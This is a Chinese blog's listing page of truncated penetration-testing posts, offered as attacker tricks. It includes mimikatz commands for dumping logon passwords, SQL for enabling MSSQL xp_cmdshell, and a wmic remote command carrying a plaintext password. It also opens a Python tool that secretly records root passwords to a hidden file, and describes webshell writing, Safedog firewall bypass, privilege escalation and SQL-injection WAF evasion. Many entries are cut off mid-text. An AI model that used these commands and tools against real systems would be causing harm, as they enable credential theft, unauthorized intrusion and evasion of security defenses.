![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透技巧
小鱼儿waha
抓紧 留给自己的时间不多了
展开
-
总结下写phpmyadmin写shell的方法
导出WebShell主要条件:1.Root数据库用户(root权限)2.网站绝对路径(确定有写入权限)3.magic_quotes_gpc:Off(关闭)导出WebShell其它条件:1.magic_quotes_gpc:开启时,会对’单引号进行转义,使其变成“\”反斜杠。2.secure_file_priv:此配置项用来完成对数据导入导出的限制,如允许导入导出到指定目录。3.fil...原创 2019-03-29 23:20:27 · 5882 阅读 · 0 评论 -
使用mimikatz的技巧
1、以日志文件生成保存在当前文件夹中log.txt 并且再列出目录mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2、自定义保存在log.txt中mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpassw...原创 2019-08-03 10:25:05 · 1007 阅读 · 0 评论 -
cs和msf配合进行内网的操作
cs中直接添加一个socks代理msf中的操作相应的cs中socks的代理端口,然后利用msf对内网进一步的探测setg Proxies socks4:xxx.xxx.xxx.xxx:44803原创 2019-08-03 23:13:59 · 1612 阅读 · 0 评论 -
命令符& && ||的区别
aa && bb执行aa,成功后再执行bbaa || bb先执行aa,若执行成功则不再执行bb,若失败则再执行bbaa & bb先执行aa再执行bb,无论aa是否成功原创 2019-08-04 20:57:19 · 293 阅读 · 0 评论 -
mysql提权和技巧
不会免杀 对于udf提权的话 市面上的udf.dll udf的提权脚本基本遇到360之类的杀毒软件都GG思密达 但是可能能通过以下方法来绕过:将自己要提权的php脚本后缀修改为csproj 然后再通过包含文件...原创 2019-08-05 14:04:04 · 272 阅读 · 0 评论 -
Gene6 FTP Server的提权方法
http://blog.chinaunix.net/uid-28991324-id-4291928.html原创 2019-08-05 22:51:23 · 331 阅读 · 0 评论 -
BurpSuite之检测CORS方便化
哈哈 标题够中二够沙雕果然会有人来看 分享下burpsuite挖掘cors的技巧哈!!!CORS的漏洞主要看当我们发起的请求中带有Origin头部字段时,服务器的返回包带有CORS的相关字段并且允许Origin的域访问。但是问题来了 我们每次检测CORS都需要手动的加上去那不会太麻烦吗(emm 除非你用工具批量检测哈 当我没说) 这里有个方法推荐给大家。首先是自动在HTTP请求包中加上O...原创 2019-07-28 21:30:26 · 3000 阅读 · 0 评论 -
MSSQL的提权
MSSQL的提权:1、sql2005版本以后默认为关闭状态,需要开启命令执行开启xp_cmdshell;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;注入点不支持多执行的话,需要一句一句的运行;exec sp_configur...原创 2019-08-19 14:18:34 · 501 阅读 · 0 评论 -
mysql的权限管理和用户创建
通过grant和revoke可以在几个层次上控制访问权限1,全局层级:整个服务器,使用 grant ALL 和revoke ALL2,数据库层级:整个数据库,使用on database.*3,表层级:特点表,使用on database.table4,列层级:特定的列5,子程序层级:特定的存储过程权限管理:一、权限命令标识 授权表中对应的列...原创 2019-08-10 13:31:29 · 147 阅读 · 0 评论 -
mysql低权限读取文件利用
此时的test用户是没有file读取权限的:利用语句:load data local infile 'D:\\QMDownload\\PHPTutorial\\www\\Sqlilabs\\phpinfo.php' into table users fields terminated by '' lines terminated by '\n';fields terminated by ‘,...原创 2019-08-22 13:08:40 · 1011 阅读 · 0 评论 -
windows获取RDP连接记录
0x01 获取RDP连接历史记录:以下代码为3gStudent实现的获取连接记录的代码:<#.SYNOPSISThis script will list the logged-in users' RDP Connections History.Author: 3gstudent@3gstudentLicense: BSD 3-Clause#>$AllUser = Get...原创 2019-08-26 13:01:06 · 5751 阅读 · 0 评论 -
phpmyadmin渗透小技巧
只是单纯的记录给自己看的哈 如果大家看到不要嫌弃一些建站软件或者傻瓜式的搭建软件phpmyadmin常会在888、999的端口我们可以尝试用nikto进行检测相应的未授权漏洞nikto -host http://测试域名地址:999/setup这个目录有时候管理员不会关闭 因为默认安装的 隐患很大哈 恰恰也能利用自己能够直接未授权进行操作 我们可以直接新建服务器在认证页面的时候 ...原创 2019-09-10 22:13:52 · 1036 阅读 · 0 评论 -
Windows远程执行cmd命令的方法
觉得对自己有用 于是就记录下来了WMI执行命令(普通权限可以进行hash传递):无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt"利用wmiexec工具配合进行反弹半交互shell:cscript.e...原创 2020-04-15 18:01:19 · 37385 阅读 · 0 评论 -
BurpSuite解决爆破时候全是302的方法
有时候爆破会遇到多个302跳转BurpSuite有一个设置可以跟随跳转这样子设置了 burp就会跟到302跳转的界面 返回不同的页面长度 以此来进行判断原创 2019-09-16 20:25:09 · 8604 阅读 · 2 评论 -
关于从js下手的一些渗透经验
如下说的并不是一定是的 还是根据实际情况来判断!!!1、如何判断是JS开发的站1、源代码简短2、引入多个js文件3、一般有/static/js/app.js 等顺序的js文件4、cookie中有connect.sid如何查看重要js文件1、寻找配置文件2、查看app.xxx.js(一般引入的js文件都在static静态目录下 搜索的时候可以直接尝试static搜索下手)查看j...转载 2019-09-25 19:56:16 · 1527 阅读 · 2 评论 -
越权漏洞的挖掘
越权的理解:能够操作超越本身权限之外的操作比如在一个商城类型网站里面 一般有三种用户 1、游客2、会员3、管理员越权也分为三种 1、平行越权2、垂直越权3、Cookie越权我们也可以想下对于越权的操作里应当是服务端没有正确的处理好所接收的参数而接收任意的参数然后返回请求者所要请求的的任意内容那么这里就有参数这个点:参数 所在的http报文的位置: 1、get请求参数 2、post请求参数...原创 2019-07-07 15:02:25 · 968 阅读 · 1 评论 -
记录root密码小工具
#!/usr/bin/pythonimport os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M")logfile="/dev/shm/.su.log" //密码获取后记录在这里#CentOS #fail_str = "su: inc...原创 2019-07-11 23:08:26 · 224 阅读 · 0 评论 -
护卫神6588端口提权
利用条件:1.有shell2.有可执行脚本<?phpfunction httpGet() { $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($c...原创 2019-04-06 21:34:49 · 1574 阅读 · 0 评论 -
菜刀过狗连接webshell的技巧
自己在搭建的服务器上创建一个有以下代码的php文件 然后用菜刀来连接这个php文件 通过其中的代码的加密方式传输数据 达到过安全狗的目的····$target="http://192.168.1.131:81/1.php";//$target里面的url 就是你的webshell的地址$poststr='';$i=0;foreach($_POST as $k=>$v){if(s...转载 2019-03-28 22:14:18 · 2191 阅读 · 0 评论 -
踩点思路
google,fofa,zoomeye搜索页面特征(备案、电话、机构等等)找相关站点。(避免根域搜集不全的情况)wooyun历史漏洞库搜相关业务站点(避免根域搜集不全的情况)找二级域(SubDomainscanner,layer). 相关合作公司以真实IP,旁注(旁站查询),robtex找同网段或C段(webfind/ipscan24)(有些业务没有域名)...原创 2019-04-08 21:24:32 · 203 阅读 · 0 评论 -
windows和linux默认的一些重要的配置文件
Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\mysql\my.ini // MySQL配置c:\ProgramFiles\mysql\data\mysql...原创 2019-04-14 21:40:16 · 367 阅读 · 0 评论 -
iis如何更加的安全配置
1、aspx 木马文件可以在asp.net空间中实现读取进程、iis信息、跨站、执行cmd命令。解决方法1、对于每个网站建立一个用户、并将用户放入guest组,给站点写入、读取的权限。并在iis上允许匿名访问。2、<system.web>< identity impersonate=“true” /></system.web>将以上代码复制到C:\...原创 2019-05-04 21:56:15 · 581 阅读 · 0 评论 -
SSI指令利用
shtml的作用很多 这里就讲能够包含文件当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#inclu...原创 2019-05-05 12:27:00 · 602 阅读 · 0 评论 -
windows常用的dos和域命令
whoami查看当前权限,当不是administrator或者system时需要提权ipconfig,查看服务器为内网还是外网,内网进服务器则需要转发端口.quser或者是query user查看管理是否在线systeminfo查看服务器信息及相应的补丁,可找相应的补丁提权tasklist查看当前运行的进程,是否有av(杀软),可利用的第三方的服务提权等net user查看用户,当发现...原创 2019-05-05 16:33:27 · 428 阅读 · 0 评论 -
mysql联合注入绕过安全狗4.0
环境win2003apachemysqlphp操作http://192.168.1.131/Less-1/index.php?id=1 数值型注入首先判断是否存在注入点这里使用的是科学记数法 简单粗暴http://192.168.1.131/Less-1/index.php?id=1e0 不变http://192.168.1.131/Less-1/index.php?id=1...原创 2019-05-13 15:59:26 · 1868 阅读 · 4 评论 -
SMB绕过php远程文件包含的限制
环境linux 一台 192.168.1.130window 一台 192.168.1.131搭建1.window的环境搭建的环境中 在php.ini里面”allow_url_fopen”和“allow_url_include“设置为Off2.在linux上搭建一个samba服务器 进行如下操作apt-get install samba 安装samba服务mkdir /var...原创 2019-06-01 12:16:01 · 613 阅读 · 0 评论 -
快速定位域内邮件服务器
1.扫描域内机器端口25,110等特定端口2.服务识别3.ping主机名的判断4.如域名为payload.com 可以尝试ping mail.payload.com原创 2019-06-01 12:47:46 · 780 阅读 · 0 评论 -
虚拟主机的提权两个小技巧
从别人那里看到了 对虚拟主机的提权很有帮助 就收藏了0x01:是否大家会想到调用远程路径去执行CMD,比如(\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活...转载 2019-06-16 09:54:23 · 832 阅读 · 0 评论 -
漏洞挖掘信息的搜集
这个暑假要开始学习挖洞了 很开心 希望自己能够学的越来越快 暑假里面会记录自己的点点滴滴 看看暑假完了自己是咋样的哈!!!子域名收集子域名收集途径1.通过dns查询 A记录2.爆破二级子域名3.C端扫描搜集相应的域名网站4.爬取递归爬取子域名下的相关二级域名子域名收集的工具https://github.com/lijiejie/subDomainsBrute 多功能爬取、D...原创 2019-06-30 15:28:00 · 708 阅读 · 0 评论 -
Google Hacking学习
对公网的语法:Index of /passwordIndex of / passwd“index?of/” xxx?(mp3、pdf)“Index of /” password.txtinurl:logininurl:php?id=1inurl:baidu.cominurl:phpMyAdmininurl:ewebeditorintitle:后台管理intitle:后台管理 ...原创 2019-09-26 22:36:05 · 1236 阅读 · 0 评论